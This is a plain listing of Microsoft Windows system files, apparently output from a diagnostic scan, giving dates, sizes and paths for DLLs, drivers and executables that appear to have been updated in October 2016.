2016-10-15 15:28 - 2016-09-12 11:08 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-10-15 15:28 - 2016-09-12 11:08 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-10-15 15:28 - 2016-09-12 10:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-10-15 15:28 - 2016-09-12 10:39 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-10-15 15:28 - 2016-09-12 10:37 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-10-15 15:28 - 2016-09-12 10:32 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-10-15 15:28 - 2016-09-12 10:32 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-10-15 15:28 - 2016-09-12 10:32 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-10-15 15:28 - 2016-09-12 10:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-10-15 15:28 - 2016-09-12 10:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-10-15 15:28 - 2016-09-12 10:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-10-15 15:28 - 2016-09-12 09:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-10-15 15:28 - 2016-09-12 08:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-10-15 15:28 - 2016-09-12 08:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-10-15 15:28 - 2016-09-10 06:19 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-10-15 15:28 - 2016-09-10 05:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-10-15 15:28 - 2016-09-09 08:29 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-10-15 15:28 - 2016-09-09 08:26 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-10-15 15:28 - 2016-09-09 08:23 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 08:01 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-10-15 15:28 - 2016-09-09 08:00 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:51 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-10-15 15:28 - 2016-09-09 07:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-10-15 15:28 - 2016-09-09 07:51 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-10-15 15:28 - 2016-09-09 07:48 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-10-15 15:28 - 2016-09-09 07:47 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-10-15 15:28 - 2016-09-09 07:43 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-10-15 15:28 - 2016-09-09 07:38 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-10-15 15:28 - 2016-09-09 07:38 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-10-15 15:28 - 2016-09-09 07:38 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-10-15 15:28 - 2016-09-09 07:38 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-10-15 15:28 - 2016-09-09 07:37 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-10-15 15:28 - 2016-09-09 07:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-10-15 15:28 - 2016-09-08 10:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll
2016-10-15 15:28 - 2016-09-08 04:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-10-15 15:28 - 2016-09-08 04:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-10-15 15:18 - 2016-07-22 04:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2016-10-15 15:18 - 2016-07-22 04:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2016-10-09 22:51 - 2016-09-12 11:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-10-09 22:51 - 2016-09-12 11:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-10-09 22:51 - 2016-09-09 05:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-10-09 22:11 - 2016-08-29 05:31 - 14183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-10-09 22:11 - 2016-08-29 05:31 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-10-09 22:11 - 2016-08-29 05:31 - 01867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-10-09 22:11 - 2016-08-29 05:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-10-09 22:11 - 2016-08-29 05:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-10-09 22:11 - 2016-08-29 05:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-10-09 22:11 - 2016-08-29 05:04 - 03229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-10-09 22:11 - 2016-08-29 04:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-10-09 22:11 - 2016-08-16 10:40 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-10-09 22:11 - 2016-08-16 10:40 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-10-09 22:11 - 2016-08-12 07:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-10-09 22:11 - 2016-08-12 07:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-10-09 22:11 - 2016-08-12 07:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-10-09 22:11 - 2016-08-12 06:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2016-10-09 22:11 - 2016-08-12 06:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-10-09 22:11 - 2016-08-12 06:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2016-10-09 22:11 - 2016-08-12 06:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2016-10-09 22:11 - 2016-08-06 05:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-10-09 22:11 - 2016-08-06 05:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll
2016-10-09 22:11 - 2016-08-06 05:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-10-09 22:11 - 2016-08-06 05:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-10-09 22:11 - 2016-08-06 04:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2016-10-09 22:11 - 2016-08-06 04:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2016-10-09 22:11 - 2016-08-06 04:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2016-10-09 22:11 - 2016-06-14 07:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-10-09 22:11 - 2016-06-14 07:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2016-10-09 22:11 - 2016-06-14 07:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
